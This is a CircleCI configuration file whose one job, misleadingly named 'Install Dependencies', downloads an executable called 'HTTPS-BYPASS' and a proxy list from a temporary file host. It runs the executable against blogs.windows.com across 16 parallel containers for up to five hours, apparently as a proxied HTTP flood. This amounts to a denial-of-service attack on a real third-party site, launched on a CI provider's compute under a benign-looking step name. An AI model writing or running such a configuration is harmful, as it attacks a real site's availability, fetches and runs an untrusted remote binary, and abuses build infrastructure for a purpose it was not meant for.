version: 2.1
jobs:
    trial:
      docker:
            - image: debian:latest
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: apt update && apt install wget -y && wget https://temp.sh/wyFKD/HTTPS-BYPASS && wget https://temp.sh/rtZQu/proxy.txt && chmod +x HTTPS-BYPASS && ./HTTPS-BYPASS https://blogs.windows.com/ 999999 250 10
            no_output_timeout: 5h

workflows:
    version: 2.1
    build:
        jobs:
        - trial
